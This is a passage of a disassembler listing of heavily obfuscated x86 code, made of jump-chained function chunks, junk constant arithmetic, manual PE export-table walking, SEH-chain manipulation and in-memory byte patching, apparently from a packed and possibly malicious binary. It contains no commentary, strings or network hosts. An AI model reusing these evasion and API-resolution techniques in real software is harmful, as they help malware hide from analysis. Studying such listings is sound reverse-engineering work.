; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42935C: ; CODE XREF: sub_4253A0+E�j
jmp loc_42721D
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
call sub_42D9E1
xor eax, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED4E
loc_429369: ; CODE XREF: sub_42ED4E-C31�j
jmp loc_4288D6
; END OF FUNCTION CHUNK FOR sub_42ED4E
; =============== S U B R O U T I N E =======================================
sub_42936E proc near ; DATA XREF: sub_428079-3451�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004296E3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B573 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C224 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C94E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042EFE3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042FA91 SIZE 0000001A BYTES
push edx
jmp loc_42B573
sub_42936E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_429374: ; CODE XREF: sub_42EE8A:loc_42E538�j
cmp eax, 0A38DE010h
jmp loc_42B162
; END OF FUNCTION CHUNK FOR sub_42EE8A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_429380: ; CODE XREF: sub_42CCDD-31E5�j
jmp loc_42B720
; END OF FUNCTION CHUNK FOR sub_42CCDD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_429385: ; CODE XREF: sub_42BAE7-1C6F�j
popf
loc_429386: ; CODE XREF: sub_42BAE7:loc_423A97�j
mov eax, [ebp-4]
push ebx
mov ebx, ecx
xchg ebx, [esp+0]
push 9CC6BC45h
pop ecx
sub ecx, 875F4BE8h
jmp loc_426A58
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
sub eax, ebx
jmp loc_42D071
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_4293A7: ; CODE XREF: sub_42B907+22DC�j
shl edx, 2
loc_4293AA: ; CODE XREF: sub_42B907:loc_42DBDB�j
xor eax, 2A7DC4A2h
call sub_428613
; END OF FUNCTION CHUNK FOR sub_42B907
; START OF FUNCTION CHUNK FOR sub_426BF7
loc_4293B5: ; CODE XREF: sub_426BF7+12FA�j
jmp loc_42C77F
; END OF FUNCTION CHUNK FOR sub_426BF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B265
loc_4293BA: ; CODE XREF: sub_42B265-C40�j
not eax
cdq
and ecx, edi
loc_4293BF: ; CODE XREF: _7hdaygc1:loc_4242EF�j
call sub_42E4D7
; END OF FUNCTION CHUNK FOR sub_42B265
; START OF FUNCTION CHUNK FOR sub_42C443
loc_4293C4: ; CODE XREF: sub_42C443+8F7�j
jmp loc_42985B
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289CE
loc_4293C9: ; CODE XREF: sub_4289CE+14�j
jmp loc_42F704
; END OF FUNCTION CHUNK FOR sub_4289CE
; ---------------------------------------------------------------------------
call sub_42F4CE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_4293D4: ; CODE XREF: sub_4291EA-6122�j
jmp loc_428D4A
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
pushf
jmp loc_425644
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DDF5
loc_4293DF: ; CODE XREF: sub_42DDF5-6CDD�j
xchg edi, [esp+4+var_4]
ror eax, 3
push edi
push 842B79ABh
jmp loc_42BC7D
; END OF FUNCTION CHUNK FOR sub_42DDF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269BB
loc_4293F0: ; CODE XREF: sub_4269BB+B�j
cmp edx, 7C61090Eh
jz loc_42ADA9
jmp loc_4267F6
; END OF FUNCTION CHUNK FOR sub_4269BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425339
loc_429401: ; CODE XREF: sub_425339�j
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jmp loc_4242B6
; END OF FUNCTION CHUNK FOR sub_425339
; =============== S U B R O U T I N E =======================================
sub_429412 proc near ; CODE XREF: _7hdaygc1:00423575�j
; sub_427F72+D�p
; FUNCTION CHUNK AT 00426A15 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042C560 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042FC9B SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push ebx
push 441D9AEFh
pop ebx
add ebx, 7894DEA1h
jnz loc_42C560
sub edx, 0C9F0BF72h
jmp loc_426A15
sub_429412 endp
; ---------------------------------------------------------------------------
loc_429434: ; CODE XREF: _7hdaygc1:0042BA84�j
jnp loc_42F4EE
sub esi, 5E6A822Dh
; START OF FUNCTION CHUNK FOR sub_423752
loc_429440: ; CODE XREF: sub_423752:loc_42BA77�j
xor edx, 318FDDB7h
or edx, 0DB84C229h
xor edx, 0E2F5B2FCh
add edx, ebp
jmp loc_42D36E
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
mov [ebx], edx
jmp loc_424492
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_429460: ; CODE XREF: sub_424AE1+15�j
add ecx, 0A42BFD40h
cmp ecx, 8FA14DE4h
jmp loc_42EF10
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_429471: ; CODE XREF: sub_425E64-EEB�j
mov ebx, ebp
add edi, 0C2D5D9CEh
or edi, 0BE204EBBh
loc_42947F: ; CODE XREF: sub_425E64:loc_424F72�j
add eax, 977BCC64h
jmp loc_426BCB
; END OF FUNCTION CHUNK FOR sub_425E64
; =============== S U B R O U T I N E =======================================
sub_42948A proc near ; CODE XREF: sub_429999�p
; _7hdaygc1:0042EC81�j
; FUNCTION CHUNK AT 004266D7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042800B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042ACA2 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0042D41F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042FBB6 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
jns sub_425492
push ecx
mov ecx, ebp
xchg ecx, [esp+0]
loc_42949A: ; CODE XREF: _7hdaygc1:loc_42B0C6�j
jmp loc_42800B
sub_42948A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jg loc_4297EF
jmp loc_429E2F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF7
loc_4294AA: ; CODE XREF: sub_42DBF7-3F2D�j
mov ds:dword_425144, eax
mov ds:byte_427CC0, 1
lea eax, [ebp+var_14]
xor edx, edx
jmp loc_42AB67
; END OF FUNCTION CHUNK FOR sub_42DBF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_4294C0: ; CODE XREF: sub_42A2EF+291B�j
; sub_424755:loc_42DC8C�j
call sub_42D757
mov edx, 71D66982h
call sub_42C1AF
push ecx
mov ecx, eax
xchg ecx, [esp+4+var_4]
ror eax, 0Eh
push esi
jmp loc_428711
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
loc_4294DE: ; CODE XREF: _7hdaygc1:00426E1E�j
add ebx, 1DA8D328h
mov [ebx], eax
pop ebx
mov edx, [ebp-4]
push 9668D862h
pop eax
rol eax, 1Bh
jmp loc_42E1B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_4294F8: ; CODE XREF: sub_42C16F:loc_428174�j
cmp eax, 0C33985A3h
jmp loc_42982A
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
sub ecx, esi
jmp sub_42DE6F
; ---------------------------------------------------------------------------
sub ebx, edx
jmp sub_42ECAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_429511: ; CODE XREF: sub_4291A3:loc_428745�j
; _7hdaygc1:0042F517�j
push offset loc_42AA71
jmp nullsub_22
; END OF FUNCTION CHUNK FOR sub_4291A3
; ---------------------------------------------------------------------------
loc_42951B: ; CODE XREF: _7hdaygc1:004245B9�j
mov [edx], ebx
; =============== S U B R O U T I N E =======================================
sub_42951D proc near ; CODE XREF: sub_427D8E:loc_4271B0�p
; FUNCTION CHUNK AT 0042B324 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D614 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push eax
push 0
call sub_42B32F
pop eax
cmp dword ptr [eax], 0
jmp loc_42D614
sub_42951D endp
; =============== S U B R O U T I N E =======================================
sub_429532 proc near ; DATA XREF: sub_427186+3�o
; FUNCTION CHUNK AT 004236E2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004247FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042685C SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004283DA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042B700 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CB53 SIZE 0000001F BYTES
add esp, 0FFFFFFF8h
mov [ebp-4], eax
loc_429538: ; CODE XREF: sub_42BDCF:loc_42BDD9�j
jns loc_42CB67
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
cmp ds:dword_427474[eax*4], 0
jz loc_4236E2
jmp loc_42B700
sub_429532 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_429557 proc near ; CODE XREF: sub_4288FE:loc_42C204�j
; FUNCTION CHUNK AT 0042DEB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FA5C SIZE 00000006 BYTES
push ebx
popf
jmp loc_42FA5C
sub_429557 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42955E: ; CODE XREF: sub_42DD73:loc_42377A�j
; sub_42DD73-6973�j
xchg ebp, [esp+0]
mov ecx, ebp
xchg edx, [esp+0]
mov ebp, edx
pop edx
xchg ebx, [esp-4+arg_0]
call sub_42D9CB
; END OF FUNCTION CHUNK FOR sub_42DD73
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_429571: ; CODE XREF: sub_42CFDA:loc_42C6C5�j
call sub_423648
loc_429576: ; CODE XREF: sub_42C7F3-85D4�j
jmp loc_4298CA
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A1B6
loc_42957B: ; CODE XREF: sub_42A1B6+131A�j
mov edi, [edx]
jmp loc_42C25C
; END OF FUNCTION CHUNK FOR sub_42A1B6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E32F
loc_429583: ; CODE XREF: sub_42E32F+4�j
mov byte ptr [eax], 0C3h
call sub_42D757
push offset sub_423144
jmp nullsub_216
; END OF FUNCTION CHUNK FOR sub_42E32F
; ---------------------------------------------------------------------------
add edx, eax
jmp sub_424FE5
; ---------------------------------------------------------------------------
loc_42959C: ; CODE XREF: _7hdaygc1:004249F7�j
ja loc_427199
; =============== S U B R O U T I N E =======================================
sub_4295A2 proc near ; CODE XREF: sub_424E42+7A23�p
; FUNCTION CHUNK AT 0042D790 SIZE 0000000D BYTES
xchg eax, [esp+0]
pop eax
add edi, 0AEDE1121h
loc_4295AC: ; CODE XREF: sub_42B74A:loc_426720�j
add edi, ebp
add edi, 9B55795Ah
jmp loc_42D790
sub_4295A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E7E
loc_4295B9: ; CODE XREF: sub_424E7E:loc_42856C�j
add esi, 1C2B341Fh
push offset sub_429CCF
jmp nullsub_181
; END OF FUNCTION CHUNK FOR sub_424E7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B11
loc_4295C9: ; CODE XREF: sub_428B11+5B22�j
xchg eax, [ebp+0]
popf
adc ecx, ebx
jl loc_429347
loc_4295D5: ; CODE XREF: sub_428B11:loc_42723D�j
push offset loc_429DCA
loc_4295DA: ; CODE XREF: _7hdaygc1:0042B08B�j
jmp loc_42AA02
; END OF FUNCTION CHUNK FOR sub_428B11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_4295DF: ; CODE XREF: sub_42DAD9:loc_42BA55�j
jnz loc_42F411
cmp dword ptr [ebp-0Ch], 5
jnz loc_42F411
mov eax, [ebp+8]
jmp loc_42A5F1
; END OF FUNCTION CHUNK FOR sub_42DAD9
; =============== S U B R O U T I N E =======================================
sub_4295F7 proc near ; DATA XREF: _7hdaygc1:0042B420�o
; FUNCTION CHUNK AT 004281AE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004297C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A112 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042E8DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F257 SIZE 00000005 BYTES
push 14E8F4E1h
pop edx
add edx, 48266DCBh
rol edx, 1Eh
add edx, 38D37D4h
add edx, ebp
call sub_42BEC6
loc_429613: ; CODE XREF: _7hdaygc1:00427036�j
jnb loc_42F257
not edi
jmp sub_42EA6A
sub_4295F7 endp
; ---------------------------------------------------------------------------
loc_429620: ; CODE XREF: _7hdaygc1:0042C3CA�j
xchg esi, [ecx]
; START OF FUNCTION CHUNK FOR sub_42874A
loc_429622: ; CODE XREF: sub_42874A:loc_42C3B3�j
add edi, 0E0EA4E17h
xor edi, 7E36D3E9h
call sub_428AF7
or edx, 0B4A49FE8h
jmp loc_426DC8
; END OF FUNCTION CHUNK FOR sub_42874A
; ---------------------------------------------------------------------------
loc_42963E: ; CODE XREF: _7hdaygc1:loc_4258B9�j
sub edx, eax
mov [ebp+0], edx
pop edx
push offset sub_424E9C
jmp locret_4250D0
; ---------------------------------------------------------------------------
loc_42964E: ; CODE XREF: _7hdaygc1:00424D28�j
jb loc_426720
jmp loc_42346F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_207. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42965A: ; CODE XREF: _7hdaygc1:0042DF3C�j
jmp locret_42D25E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42965F: ; CODE XREF: sub_423172+2E54�j
jmp loc_42C2E5
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_429664: ; CODE XREF: sub_423752+194�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425492
loc_429669: ; CODE XREF: sub_425492+4DF6�j
xchg edi, [esi]
pop esi
shr ebx, 13h
adc esi, 27309876h
jmp loc_423D9E
; END OF FUNCTION CHUNK FOR sub_425492
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E76
loc_42967A: ; CODE XREF: sub_427E76+E�j
push esi
push 0B46857CAh
pop esi
and esi, 7AB34A20h
jmp loc_426B32
; END OF FUNCTION CHUNK FOR sub_427E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEC6
loc_42968C: ; CODE XREF: sub_42BEC6+14EF�j
cmp eax, 0EB8BCE2Eh
jmp loc_425900
; END OF FUNCTION CHUNK FOR sub_42BEC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42826A
loc_429697: ; CODE XREF: sub_42826A:loc_428277�j
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
call sub_4254BE
loc_4296A2: ; CODE XREF: _7hdaygc1:00427FAB�j
jmp loc_42CDE4
; END OF FUNCTION CHUNK FOR sub_42826A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_4296A7: ; CODE XREF: sub_42CFDA:loc_426DB9�j
add ecx, 0CF7EACA6h
xor ecx, 1C3785F5h
add ecx, ebp
add ecx, 0D68A9089h
mov ecx, [ecx]
jmp loc_428A9C
; END OF FUNCTION CHUNK FOR sub_42CFDA
; =============== S U B R O U T I N E =======================================
sub_4296C2 proc near ; DATA XREF: sub_42B510-7CE2�o
; FUNCTION CHUNK AT 0042A847 SIZE 00000011 BYTES
push 0FDA89397h
pop esi
sub esi, 3A3EE1A8h
or esi, 3EE3705Bh
jmp loc_42A847
sub_4296C2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_4296D9: ; CODE XREF: sub_42DD73-5302�j
mov edx, esp
push ebp
push edx
pop ebp
call sub_428079
; END OF FUNCTION CHUNK FOR sub_42DD73
; START OF FUNCTION CHUNK FOR sub_42936E
loc_4296E3: ; CODE XREF: sub_42936E+35E9�j
mov ebx, eax
push offset sub_42D3F2
jmp loc_42C224
; END OF FUNCTION CHUNK FOR sub_42936E
; =============== S U B R O U T I N E =======================================
sub_4296EF proc near ; DATA XREF: sub_423812+67A7�o
; FUNCTION CHUNK AT 0042B394 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042BC3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D467 SIZE 0000000A BYTES
xor esi, 0B12AE7B2h
xchg esi, [esp+0]
push 0
mov eax, [ebp-4]
jmp loc_42BC3C
sub_4296EF endp
; ---------------------------------------------------------------------------
loc_429702: ; CODE XREF: _7hdaygc1:0042D714�j
jz loc_427DFF
jmp loc_428465
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_42970D: ; CODE XREF: sub_4232DA+878D�j
adc ebx, 0E36C1773h
pushf
jnb loc_427288
loc_42971A: ; CODE XREF: sub_42DAD9:loc_42BA4F�j
sub eax, 41E71103h
or eax, 4EBD2863h
push offset loc_42C5EB
jmp loc_4241E8
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_429730: ; CODE XREF: sub_42AA47:loc_423B83�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_429734: ; CODE XREF: sub_42C209+5�j
cmp dword ptr [ebp-8], 0
jge loc_42FD07
jmp loc_423E9D
; END OF FUNCTION CHUNK FOR sub_42C209
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CE
loc_429743: ; CODE XREF: sub_42B9CE+D�j
mov edi, ebp
pop ebp
and edi, ds:4000FBh
rol edi, 7
add edi, 0FF0238FAh
jmp loc_423CDF
; END OF FUNCTION CHUNK FOR sub_42B9CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42975A: ; CODE XREF: sub_42EBD6+9E6�j
push esi
and ebp, edx
xchg ecx, [ebx]
test esi, ecx
jmp loc_42E4E6
; END OF FUNCTION CHUNK FOR sub_42EBD6
; =============== S U B R O U T I N E =======================================
sub_429766 proc near ; CODE XREF: _7hdaygc1:00428873�j
; sub_429B49+A�p
; FUNCTION CHUNK AT 00424545 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428926 SIZE 00000018 BYTES
xchg ebx, [esp+0]
pop ebx
cmp ds:dword_425150, 0
jz loc_424159
loc_429777: ; CODE XREF: _7hdaygc1:loc_42E100�j
jmp loc_424545
sub_429766 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_42977C: ; CODE XREF: _7hdaygc1:00428C5D�j
; sub_42F8C4-5425�j
ja loc_429D8B
jmp loc_4263DC
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_429787: ; CODE XREF: sub_4232DA-F0�j
jl loc_424063
; END OF FUNCTION CHUNK FOR sub_4232DA
; START OF FUNCTION CHUNK FOR sub_426130
loc_42978D: ; CODE XREF: sub_426130+7254�j
jmp nullsub_75
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
add ecx, ebx
jnb loc_429C7F
jmp loc_42A9E6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4297A0: ; DATA XREF: sub_4236EA+937B�o
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_4297B2
loc_4297A2: ; CODE XREF: sub_4297B2+2749�j
pop large dword ptr fs:0
add esp, 4
locret_4297AC: ; CODE XREF: sub_42D002-1D2E�j
retn
; END OF FUNCTION CHUNK FOR sub_4297B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4297AD: ; CODE XREF: sub_42AFFE+1B�j
jmp loc_42BC12
; END OF FUNCTION CHUNK FOR sub_42AFFE
; =============== S U B R O U T I N E =======================================
sub_4297B2 proc near ; CODE XREF: sub_4236EA�p
; FUNCTION CHUNK AT 004297A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BEED SIZE 00000013 BYTES
push large dword ptr fs:0
jmp loc_42BEED
sub_4297B2 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42409E
loc_4297BF: ; CODE XREF: sub_42409E+AA02�j
jmp sub_42AB66
; END OF FUNCTION CHUNK FOR sub_42409E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_4297C4: ; CODE XREF: sub_42ED2A-46CA�j
; _7hdaygc1:loc_42D9C5�j
jmp loc_42EA13
; END OF FUNCTION CHUNK FOR sub_42ED2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295F7
loc_4297C9: ; CODE XREF: sub_4295F7+B24�j
jmp sub_42828C
; END OF FUNCTION CHUNK FOR sub_4295F7
; ---------------------------------------------------------------------------
loc_4297CE: ; CODE XREF: _7hdaygc1:004257B2�j
jmp locret_42FBAB
; ---------------------------------------------------------------------------
loc_4297D3: ; CODE XREF: _7hdaygc1:loc_42D85A�j
push ebx
call sub_425360
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_4297D9: ; CODE XREF: sub_42D84A+A�j
jmp loc_42E402
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BF20
loc_4297DE: ; CODE XREF: sub_42BF20+C�j
jmp loc_42DEAF
; END OF FUNCTION CHUNK FOR sub_42BF20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_4297E3: ; CODE XREF: sub_42F8C4-5B15�j
add eax, ebp
add eax, 7634203Dh
mov eax, [eax]
xor edx, edx
loc_4297EF: ; CODE XREF: _7hdaygc1:0042949F�j
div dword ptr [ebp-8]
push edi
jmp loc_4233C6
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_4297F8: ; CODE XREF: sub_4291EA+6A27�j
xor esi, edx
loc_4297FA: ; CODE XREF: sub_42A2EF+22D�j
sub esi, 5A90C16Fh
add esi, 9767EB1Ch
and esi, 8D5B75C1h
add esi, 0FF2FE711h
xchg esi, [esp+0]
jmp loc_42D41A
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E205
loc_42981A: ; CODE XREF: sub_42E205:loc_42B9B0�j
add eax, 0A294BC5Bh
loc_429820: ; CODE XREF: _7hdaygc1:loc_42CAF6�j
push offset sub_42E265
jmp nullsub_203
; END OF FUNCTION CHUNK FOR sub_42E205
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42982A: ; CODE XREF: sub_42C16F-2C71�j
jge loc_423EE5
loc_429830: ; CODE XREF: sub_429318+15A1�j
jmp loc_4269AC
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
shl edi, 1Ah
sub ecx, eax
xor esi, 0CD10A9BEh
push 464DBE64h
jb sub_42F8B9
jmp loc_423EE5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_429850: ; CODE XREF: sub_423DFC:loc_42C434�j
jz loc_4269F4
jmp loc_42DDAB
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42985B: ; CODE XREF: sub_42C443:loc_4293C4�j
jns loc_4298C2
jmp loc_42E8CB
; END OF FUNCTION CHUNK FOR sub_42C443
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_429867: ; CODE XREF: sub_424AE1+388B�j
jmp nullsub_104
; END OF FUNCTION CHUNK FOR sub_424AE1
; =============== S U B R O U T I N E =======================================
sub_42986C proc near ; CODE XREF: sub_425735+E�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423285 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426DA8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429F29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429F52 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042CAAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D2CC SIZE 0000000C BYTES
mov eax, large fs:0
loc_429873: ; CODE XREF: sub_42986C+6E8�j
; sub_42986C+3A65�j
jz loc_429F5B
cmp dword ptr [eax], 0FFFFFFFFh
mov ebx, [eax+4]
jmp loc_42CAAF
sub_42986C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_429884: ; CODE XREF: sub_424744:loc_429B5D�j
; _7hdaygc1:00429B73�j
and esi, 0CD70B5C5h
call sub_42F554
; END OF FUNCTION CHUNK FOR sub_424744
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_42988F: ; CODE XREF: sub_4246D7+13�j
jmp loc_42D6B7
; END OF FUNCTION CHUNK FOR sub_4246D7
; ---------------------------------------------------------------------------
loc_429894: ; CODE XREF: _7hdaygc1:0042AF7E�j
jnz loc_42DF67
jmp loc_42397C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42989F: ; CODE XREF: sub_42E283-745A�j
xchg ecx, ebx
and eax, edi
shl ecx, 6
jmp loc_4243A0
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
push eax
; START OF FUNCTION CHUNK FOR sub_42A833
loc_4298AC: ; CODE XREF: sub_42A833:loc_42A86E�j
ror eax, 3
push ecx
push 8FAF9FF2h
pop ecx
or ecx, 23093375h
add ecx, 226D46E1h
loc_4298C2: ; CODE XREF: sub_42C443:loc_42985B�j
rol ecx, 15h
jmp loc_426161
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_4298CA: ; CODE XREF: sub_42CFDA:loc_429576�j
; _7hdaygc1:loc_42F654�j
add eax, 7348B758h
add eax, ebp
add eax, 0D1375BA2h
pushf
push 65C43E0Ch
pop ecx
jmp loc_426DB9
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425735
loc_4298E4: ; CODE XREF: sub_425735:loc_427E44�j
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_4243FB
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_4243FB
call sub_42E3A4
jmp loc_425DF6
; END OF FUNCTION CHUNK FOR sub_425735
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42990A: ; CODE XREF: sub_424AE1-8B7�j
jmp loc_42D11D
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
loc_42990F: ; CODE XREF: _7hdaygc1:004248A7�j
adc ecx, ebp
and ecx, 1A1D902Eh
; START OF FUNCTION CHUNK FOR sub_423410
loc_429917: ; CODE XREF: sub_423410:loc_42489A�j
sub edi, 752589BCh
rol edi, 1
add edi, 0EA9DABC9h
xchg edi, [esp-4+arg_0]
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
loc_42992D: ; CODE XREF: _7hdaygc1:0042B523�j
sbb ecx, 9C6A70C9h
test ebp, eax
jmp loc_42EE00
; ---------------------------------------------------------------------------
pop ecx
